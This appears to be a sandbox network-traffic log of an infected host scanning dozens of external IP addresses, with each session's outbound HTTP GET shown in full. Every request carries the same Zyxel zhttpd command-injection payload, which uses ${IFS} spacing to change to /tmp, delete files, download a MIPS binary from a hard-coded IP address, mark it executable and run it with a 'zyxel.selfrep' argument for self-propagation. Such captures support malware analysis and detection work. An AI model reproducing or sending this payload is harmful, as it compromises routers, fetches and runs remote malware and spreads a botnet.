                                            Jan 14, 2024 15:50:52.672271967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7841192.168.2.2333208178.122.157.215443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672303915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7842192.168.2.2351182103.106.50.162443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672337055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7843192.168.2.233287263.31.202.109443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672353029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7844192.168.2.234588435.107.19.228443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672365904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7845192.168.2.234720217.112.140.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672405005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7846192.168.2.2358870157.242.247.233443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672431946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7847192.168.2.233950063.189.111.4443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672435999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7848192.168.2.234372019.153.35.194443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672471046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7849192.168.2.2346508119.10.179.57443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672503948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7850192.168.2.234597077.61.93.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672524929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7851192.168.2.234619070.219.157.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672549009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7852192.168.2.2340888199.226.241.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672602892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7853192.168.2.23540985.19.69.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672637939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7854192.168.2.233883044.147.88.33443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672652960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7855192.168.2.2355920172.5.179.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672682047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7856192.168.2.235176253.208.109.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672732115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7857192.168.2.2340602217.87.246.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672760010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7858192.168.2.233432460.43.187.141443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672800064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7859192.168.2.235095296.244.71.79443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672840118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7860192.168.2.235901640.154.92.91443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672844887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7861192.168.2.2338562171.203.254.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672884941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7862192.168.2.234072898.2.87.199443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672923088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7863192.168.2.2352806157.176.119.53443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672935963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7864192.168.2.23440101.153.26.112443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.672991991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7865192.168.2.234309018.202.176.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673002958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7866192.168.2.2341104121.198.116.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673022985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7867192.168.2.2358798112.78.58.36443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673077106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7868192.168.2.235066458.87.100.70443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673078060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7869192.168.2.2346938186.20.113.62443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673089981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7870192.168.2.2350728188.67.14.34443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673126936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7871192.168.2.235061888.171.101.3443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673149109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7872192.168.2.235551472.235.239.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673156023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7873192.168.2.2357148140.25.164.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673188925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7874192.168.2.2342230109.145.37.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673233032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7875192.168.2.2344720103.116.146.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673263073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7876192.168.2.2334106154.175.155.156443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673286915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7877192.168.2.2342054102.207.53.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673331022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7878192.168.2.234377644.19.138.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673362017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7879192.168.2.2340912153.29.22.131443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673367023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7880192.168.2.235767481.61.210.87443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673415899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7881192.168.2.2342740221.58.240.217443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673435926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7882192.168.2.2333598181.97.19.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673458099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7883192.168.2.233498649.10.195.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673491955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7884192.168.2.233807274.67.255.76443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673510075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7885192.168.2.2346386179.11.3.203443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673563004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7886192.168.2.234302439.103.241.214443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673599005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7887192.168.2.233391081.177.202.159443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673614025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7888192.168.2.2335108115.160.18.211443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673659086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7889192.168.2.234348891.243.107.74443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673676014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7890192.168.2.235611025.215.26.223443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673702002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7891192.168.2.235799042.219.21.247443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673722982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7892192.168.2.2354040125.227.186.52443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673736095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7893192.168.2.233705476.220.195.86443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673775911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7894192.168.2.2341178120.164.139.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673784018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7895192.168.2.2335222202.81.5.192443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673803091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7896192.168.2.235004850.8.34.7443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673855066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7897192.168.2.234325486.177.74.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673871994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7898192.168.2.2335018148.22.93.15443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673924923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7899192.168.2.23409262.134.94.26443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673943043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7900192.168.2.234486279.127.113.67443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673954964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7901192.168.2.2343404198.241.208.106443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673985004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7902192.168.2.233671283.80.241.195443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.673995972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7903192.168.2.2337106198.139.184.178443
                                            TimestampBytes transferredDirectionData
